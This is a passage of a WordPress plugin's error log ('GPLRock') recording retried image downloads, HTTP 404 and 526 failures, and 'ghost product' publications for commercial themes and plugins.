(attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:36:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/uaques---drinking-water-delivery-wordpress-theme-25061.webp for product uaques-drinking-water-delivery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:36:16 UTC] GPLRock: Image download failed for product uaques-drinking-water-delivery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:36:18 UTC] GPLRock: Image download failed for product uaques-drinking-water-delivery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:36:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/uaques---drinking-water-delivery-wordpress-theme-25061.webp for product uaques-drinking-water-delivery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:36:20 UTC] GPLRock WARNING: Image download failed for product uaques-drinking-water-delivery-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/uaques---drinking-water-delivery-wordpress-theme-25061.webp [05-Apr-2026 00:36:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: uaques-drinking-water-delivery-wordpress-theme [05-Apr-2026 00:36:33 UTC] GPLRock: Image downloaded successfully for product element-pack-addon-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-56ccddcf.jpg [05-Apr-2026 00:36:33 UTC] GPLRock: Using pre-downloaded image for product element-pack-addon-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-56ccddcf.jpg [05-Apr-2026 00:36:33 UTC] GPLRock: Ghost product published with image - Product ID: element-pack-addon-for-elementor [05-Apr-2026 00:36:34 UTC] GPLRock: Image downloaded successfully for product basel-responsive-ecommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d8cba29.avif [05-Apr-2026 00:36:34 UTC] GPLRock: Using pre-downloaded image for product basel-responsive-ecommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d8cba29.avif [05-Apr-2026 00:36:34 UTC] GPLRock: Ghost product published with image - Product ID: basel-responsive-ecommerce-theme [05-Apr-2026 00:36:36 UTC] GPLRock: Image downloaded successfully for product jetelements-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-da8fd048.jpg [05-Apr-2026 00:36:36 UTC] GPLRock: Using pre-downloaded image for product jetelements-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-da8fd048.jpg [05-Apr-2026 00:36:36 UTC] GPLRock: Ghost product published with image - Product ID: jetelements-for-elementor [05-Apr-2026 00:36:38 UTC] GPLRock: Image downloaded successfully for product swift-performance-ai (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5aadbeda.jpg [05-Apr-2026 00:36:38 UTC] GPLRock: Using pre-downloaded image for product swift-performance-ai: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5aadbeda.jpg [05-Apr-2026 00:36:38 UTC] GPLRock: Ghost product published with image - Product ID: swift-performance-ai [05-Apr-2026 00:36:39 UTC] GPLRock: Image downloaded successfully for product admin-menu-editor-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ed1fc81d.png [05-Apr-2026 00:36:39 UTC] GPLRock: Using pre-downloaded image for product admin-menu-editor-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ed1fc81d.png [05-Apr-2026 00:36:39 UTC] GPLRock: Ghost product published with image - Product ID: admin-menu-editor-pro [05-Apr-2026 00:36:42 UTC] GPLRock: Image download failed for product jetwoobuilder-for-elementor (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:36:46 UTC] GPLRock: Image download failed for product jetwoobuilder-for-elementor (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:36:50 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/10/JetWooBuilder-For-Elementor.jpg for product jetwoobuilder-for-elementor after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 00:36:52 UTC] GPLRock: Image download failed for product jetwoobuilder-for-elementor (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:36:56 UTC] GPLRock: Image download failed for product jetwoobuilder-for-elementor (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:37:00 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/10/JetWooBuilder-For-Elementor.jpg for product jetwoobuilder-for-elementor after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 00:37:00 UTC] GPLRock WARNING: Image download failed for product jetwoobuilder-for-elementor. URL: https://www.gplrock.com/wp-content/uploads/2020/10/JetWooBuilder-For-Elementor.jpg [05-Apr-2026 00:37:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jetwoobuilder-for-elementor [05-Apr-2026 00:37:02 UTC] GPLRock: Image downloaded successfully for product yith-auctions-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b943a8c7.jpg [05-Apr-2026 00:37:03 UTC] GPLRock: Using pre-downloaded image for product yith-auctions-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b943a8c7.jpg [05-Apr-2026 00:37:03 UTC] GPLRock: Ghost product published with image - Product ID: yith-auctions-for-woocommerce-premium [05-Apr-2026 00:37:06 UTC] GPLRock: Image downloaded successfully for product authentic-lifestyle-blog-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3dc80bed.jpg [05-Apr-2026 00:37:06 UTC] GPLRock: Using pre-downloaded image for product authentic-lifestyle-blog-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3dc80bed.jpg [05-Apr-2026 00:37:06 UTC] GPLRock: Ghost product published with image - Product ID: authentic-lifestyle-blog-magazine-wordpress-theme [05-Apr-2026 00:37:07 UTC] GPLRock: Image downloaded successfully for product woocommerce-social-login (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b41d878d.jpg [05-Apr-2026 00:37:07 UTC] GPLRock: Using pre-downloaded image for product woocommerce-social-login: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b41d878d.jpg [05-Apr-2026 00:37:07 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-social-login [05-Apr-2026 00:37:09 UTC] GPLRock: Image downloaded successfully for product presso-modern-magazine-newspaper-viral-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0c8cc82a.jpg [05-Apr-2026 00:37:09 UTC] GPLRock: Using pre-downloaded image for product presso-modern-magazine-newspaper-viral-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0c8cc82a.jpg [05-Apr-2026 00:37:09 UTC] GPLRock: Ghost product published with image - Product ID: presso-modern-magazine-newspaper-viral-theme [05-Apr-2026 00:37:36 UTC] GPLRock: Image downloaded successfully for product gravity-perks-read-only (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-119d3104.jpg [05-Apr-2026 00:37:36 UTC] GPLRock: Using pre-downloaded image for product gravity-perks-read-only: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-119d3104.jpg [05-Apr-2026 00:37:36 UTC] GPLRock: Ghost product published with image - Product ID: gravity-perks-read-only [05-Apr-2026 00:37:37 UTC] GPLRock: Image downloaded successfully for product liveblog-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6effc210.png [05-Apr-2026 00:37:37 UTC] GPLRock: Using pre-downloaded image for product liveblog-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6effc210.png [05-Apr-2026 00:37:37 UTC] GPLRock: Ghost product published with image - Product ID: liveblog-for-amp [05-Apr-2026 00:37:38 UTC] GPLRock: Image downloaded successfully for product ninja-forms-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8215e19c.png [05-Apr-2026 00:37:39 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8215e19c.png [05-Apr-2026 00:37:39 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-for-amp [05-Apr-2026 00:37:40 UTC] GPLRock: Image downloaded successfully for product polls-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2b4e2cc9.png [05-Apr-2026 00:37:40 UTC] GPLRock: Using pre-downloaded image for product polls-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2b4e2cc9.png [05-Apr-2026 00:37:40 UTC] GPLRock: Ghost product published with image - Product ID: polls-for-amp [05-Apr-2026 00:37:41 UTC] GPLRock: Image downloaded successfully for product reading-progress-bar-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ed2e9e7e.png [05-Apr-2026 00:37:41 UTC] GPLRock: Using pre-downloaded image for product reading-progress-bar-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ed2e9e7e.png [05-Apr-2026 00:37:41 UTC] GPLRock: Ghost product published with image - Product ID: reading-progress-bar-for-amp [05-Apr-2026 00:37:42 UTC] GPLRock: Image downloaded successfully for product amp-email (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bedcffe4.png [05-Apr-2026 00:37:42 UTC] GPLRock: Using pre-downloaded image for product amp-email: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bedcffe4.png [05-Apr-2026 00:37:42 UTC] GPLRock: Ghost product published with image - Product ID: amp-email [05-Apr-2026 00:37:43 UTC] GPLRock: Image downloaded successfully for product luckywp-table-of-contents-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-91072701.png [05-Apr-2026 00:37:43 UTC] GPLRock: Using pre-downloaded image for product luckywp-table-of-contents-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-91072701.png [05-Apr-2026 00:37:43 UTC] GPLRock: Ghost product published with image - Product ID: luckywp-table-of-contents-for-amp [05-Apr-2026 00:37:44 UTC] GPLRock: Image downloaded successfully for product purge-amp-cdn-cache (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fdb37ce5.png [05-Apr-2026 00:37:44 UTC] GPLRock: Using pre-downloaded image for product purge-amp-cdn-cache: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fdb37ce5.png [05-Apr-2026 00:37:44 UTC] GPLRock: Ghost product published with image - Product ID: purge-amp-cdn-cache [05-Apr-2026 00:37:46 UTC] GPLRock: Image downloaded successfully for product paid-memberships-pro-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dc87a617.png [05-Apr-2026 00:37:46 UTC] GPLRock: Using pre-downloaded image for product paid-memberships-pro-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dc87a617.png [05-Apr-2026 00:37:46 UTC] GPLRock: Ghost product published with image - Product ID: paid-memberships-pro-for-amp [05-Apr-2026 00:37:47 UTC] GPLRock: Image downloaded successfully for product conversion-goals-tracking-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-359b7f91.png [05-Apr-2026 00:37:47 UTC] GPLRock: Using pre-downloaded image for product conversion-goals-tracking-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-359b7f91.png [05-Apr-2026 00:37:47 UTC] GPLRock: Ghost product published with image - Product ID: conversion-goals-tracking-for-amp [05-Apr-2026 00:38:38 UTC] GPLRock: Image download failed for product impreza-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:38:42 UTC] GPLRock: Image download failed for product impreza-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:38:46 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Impreza-Multi-Purpose-WordPress-Theme.jpg for product impreza-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 00:38:48 UTC] GPLRock: Image download failed for product impreza-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:38:52 UTC] GPLRock: Image download failed for product impreza-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 00:38:56 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Impreza-Multi-Purpose-WordPress-Theme.jpg for product impreza-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 00:38:56 UTC] GPLRock WARNING: Image download failed for product impreza-multi-purpose-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2020/07/Impreza-Multi-Purpose-WordPress-Theme.jpg [05-Apr-2026 00:38:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: impreza-multi-purpose-wordpress-theme [05-Apr-2026 00:38:58 UTC] GPLRock: Image downloaded successfully for product zephyr-material-design-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-653a2c75.jpg [05-Apr-2026 00:38:58 UTC] GPLRock: Using pre-downloaded image for product zephyr-material-design-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-653a2c75.jpg [05-Apr-2026 00:38:58 UTC] GPLRock: Ghost product published with image - Product ID: zephyr-material-design-theme [05-Apr-2026 00:39:00 UTC] GPLRock: Image downloaded successfully for product automatewoo-marketing-automation-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-489ceeb5.jpg [05-Apr-2026 00:39:00 UTC] GPLRock: Using pre-downloaded image for product automatewoo-marketing-automation-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-489ceeb5.jpg [05-Apr-2026 00:39:00 UTC] GPLRock: Ghost product published with image - Product ID: automatewoo-marketing-automation-for-woocommerce [05-Apr-2026 00:39:01 UTC] GPLRock: Image downloaded successfully for product gravity-forms-reload-form (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-50a39705.jpg [05-Apr-2026 00:39:02 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-reload-form: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-50a39705.jpg [05-Apr-2026 00:39:02 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-reload-form [05-Apr-2026 00:39:03 UTC] GPLRock: Image downloaded successfully for product gravity-perks-gravity-forms-pay-per-word (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b92232cd.jpg [05-Apr-2026 00:39:04 UTC] GPLRock: Using pre-downloaded image for product gravity-perks-gravity-forms-pay-per-word: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b92232cd.jpg [05-Apr-2026 00:39:04 UTC] GPLRock: Ghost product published with image - Product ID: gravity-perks-gravity-forms-pay-per-word [05-Apr-2026 00:39:05 UTC] GPLRock: Image downloaded successfully for product gravity-perks-gravity-forms-copy-cat (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0992838c.jpg [05-Apr-2026 00:39:05 UTC] GPLRock: Using pre-downloaded image for product gravity-perks-gravity-forms-copy-cat: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0992838c.jpg [05-Apr-2026 00:39:05 UTC] GPLRock: Ghost product published with image - Product ID: gravity-perks-gravity-forms-copy-cat [05-Apr-2026 00:39:07 UTC] GPLRock: Image downloaded successfully for product gravity-perks-gravity-forms-conditional-pricing (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7be477d1.jpg [05-Apr-2026 00:39:07 UTC] GPLRock: Using pre-downloaded image for product gravity-perks-gravity-forms-conditional-pricing: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7be477d1.jpg [05-Apr-2026 00:39:07 UTC] GPLRock: Ghost product published with image - Product ID: gravity-perks-gravity-forms-conditional-pricing [05-Apr-2026 00:39:08 UTC] GPLRock: Image downloaded successfully for product gravity-forms-populate-anything (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d58fef00.jpg [05-Apr-2026 00:39:08 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-populate-anything: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d58fef00.jpg [05-Apr-2026 00:39:08 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-populate-anything [05-Apr-2026 00:39:10 UTC] GPLRock: Image downloaded successfully for product gravity-perks-gravity-forms-better-user-activation (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-348c639b.jpg [05-Apr-2026 00:39:10 UTC] GPLRock: Using pre-downloaded image for product gravity-perks-gravity-forms-better-user-activation: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-348c639b.jpg [05-Apr-2026 00:39:10 UTC] GPLRock: Ghost product published with image - Product ID: gravity-perks-gravity-forms-better-user-activation [05-Apr-2026 00:39:11 UTC] GPLRock: Image downloaded successfully for product ithemes-backupbuddy-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-65769e8f.jpg [05-Apr-2026 00:39:11 UTC] GPLRock: Using pre-downloaded image for product ithemes-backupbuddy-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-65769e8f.jpg [05-Apr-2026 00:39:11 UTC] GPLRock: Ghost product published with image - Product ID: ithemes-backupbuddy-wordpress-plugin [05-Apr-2026 00:39:49 UTC] GPLRock: Image download failed for product miniature-earth-3d-globe-for-javascript (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:39:51 UTC] GPLRock: Image download failed for product miniature-earth-3d-globe-for-javascript (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:39:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/miniature-earth--3d-globe-for-javascript-17326.webp for product miniature-earth-3d-globe-for-javascript after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:39:53 UTC] GPLRock: Image download failed for product miniature-earth-3d-globe-for-javascript (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:39:55 UTC] GPLRock: Image download failed for product miniature-earth-3d-globe-for-javascript (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:39:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/miniature-earth--3d-globe-for-javascript-17326.webp for product miniature-earth-3d-globe-for-javascript after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:39:57 UTC] GPLRock WARNING: Image download failed for product miniature-earth-3d-globe-for-javascript. URL: https://meldwp.com/wp-content/uploads/miniature-earth--3d-globe-for-javascript-17326.webp [05-Apr-2026 00:39:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: miniature-earth-3d-globe-for-javascript [05-Apr-2026 00:39:57 UTC] GPLRock: Image download failed for product woocommerce-customize-my-account-page-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:39:59 UTC] GPLRock: Image download failed for product woocommerce-customize-my-account-page-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-customize-my-account-page-plugin-2946.webp for product woocommerce-customize-my-account-page-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:02 UTC] GPLRock: Image download failed for product woocommerce-customize-my-account-page-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:04 UTC] GPLRock: Image download failed for product woocommerce-customize-my-account-page-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-customize-my-account-page-plugin-2946.webp for product woocommerce-customize-my-account-page-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:06 UTC] GPLRock WARNING: Image download failed for product woocommerce-customize-my-account-page-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-customize-my-account-page-plugin-2946.webp [05-Apr-2026 00:40:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-customize-my-account-page-plugin [05-Apr-2026 00:40:06 UTC] GPLRock: Image download failed for product woocommerce-paypal-website-payments-pro-hosted-solution (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:08 UTC] GPLRock: Image download failed for product woocommerce-paypal-website-payments-pro-hosted-solution (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-paypal-website-payments-pro-hosted-solution-30709.webp for product woocommerce-paypal-website-payments-pro-hosted-solution after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:10 UTC] GPLRock: Image download failed for product woocommerce-paypal-website-payments-pro-hosted-solution (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:12 UTC] GPLRock: Image download failed for product woocommerce-paypal-website-payments-pro-hosted-solution (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-paypal-website-payments-pro-hosted-solution-30709.webp for product woocommerce-paypal-website-payments-pro-hosted-solution after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:14 UTC] GPLRock WARNING: Image download failed for product woocommerce-paypal-website-payments-pro-hosted-solution. URL: https://meldwp.com/wp-content/uploads/woocommerce-paypal-website-payments-pro-hosted-solution-30709.webp [05-Apr-2026 00:40:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-paypal-website-payments-pro-hosted-solution [05-Apr-2026 00:40:15 UTC] GPLRock: Image download failed for product tiva-events-calendar-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:17 UTC] GPLRock: Image download failed for product tiva-events-calendar-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tiva-events-calendar-for-wordpress-6218.webp for product tiva-events-calendar-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:19 UTC] GPLRock: Image download failed for product tiva-events-calendar-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:21 UTC] GPLRock: Image download failed for product tiva-events-calendar-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tiva-events-calendar-for-wordpress-6218.webp for product tiva-events-calendar-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:23 UTC] GPLRock WARNING: Image download failed for product tiva-events-calendar-for-wordpress. URL: https://meldwp.com/wp-content/uploads/tiva-events-calendar-for-wordpress-6218.webp [05-Apr-2026 00:40:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tiva-events-calendar-for-wordpress [05-Apr-2026 00:40:23 UTC] GPLRock: Image downloaded successfully for product gravity-forms-range-slider-2 (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f3695091.webp [05-Apr-2026 00:40:23 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-range-slider-2: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f3695091.webp [05-Apr-2026 00:40:23 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-range-slider-2 [05-Apr-2026 00:40:23 UTC] GPLRock: Image download failed for product exicube-taxi-app (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:25 UTC] GPLRock: Image download failed for product exicube-taxi-app (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exicube-taxi-app-8368.webp for product exicube-taxi-app after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:28 UTC] GPLRock: Image download failed for product exicube-taxi-app (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:30 UTC] GPLRock: Image download failed for product exicube-taxi-app (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exicube-taxi-app-8368.webp for product exicube-taxi-app after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:32 UTC] GPLRock WARNING: Image download failed for product exicube-taxi-app. URL: https://meldwp.com/wp-content/uploads/exicube-taxi-app-8368.webp [05-Apr-2026 00:40:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: exicube-taxi-app [05-Apr-2026 00:40:32 UTC] GPLRock: Image download failed for product popup-plugin-for-wordpress-popup-editor-master-popups-for-email-subscription (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:34 UTC] GPLRock: Image download failed for product popup-plugin-for-wordpress-popup-editor-master-popups-for-email-subscription (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popup-plugin-for-wordpress--popup-editor---master-popups-for-email-subscription-27700.webp for product popup-plugin-for-wordpress-popup-editor-master-popups-for-email-subscription after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:36 UTC] GPLRock: Image download failed for product popup-plugin-for-wordpress-popup-editor-master-popups-for-email-subscription (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:38 UTC] GPLRock: Image download failed for product popup-plugin-for-wordpress-popup-editor-master-popups-for-email-subscription (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popup-plugin-for-wordpress--popup-editor---master-popups-for-email-subscription-27700.webp for product popup-plugin-for-wordpress-popup-editor-master-popups-for-email-subscription after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:40 UTC] GPLRock WARNING: Image download failed for product popup-plugin-for-wordpress-popup-editor-master-popups-for-email-subscription. URL: https://meldwp.com/wp-content/uploads/popup-plugin-for-wordpress--popup-editor---master-popups-for-email-subscription-27700.webp [05-Apr-2026 00:40:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: popup-plugin-for-wordpress-popup-editor-master-popups-for-email-subscription [05-Apr-2026 00:40:40 UTC] GPLRock: Image download failed for product super-backup-clone-migrate-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:43 UTC] GPLRock: Image download failed for product super-backup-clone-migrate-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/super-backup--clone---migrate-for-wordpress-9442.webp for product super-backup-clone-migrate-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:45 UTC] GPLRock: Image download failed for product super-backup-clone-migrate-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:47 UTC] GPLRock: Image download failed for product super-backup-clone-migrate-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 00:40:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/super-backup--clone---migrate-for-wordpress-9442.webp for product super-backup-clone-migrate-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 00:40:49 UTC] GPLRock WARNING: Image download failed for product 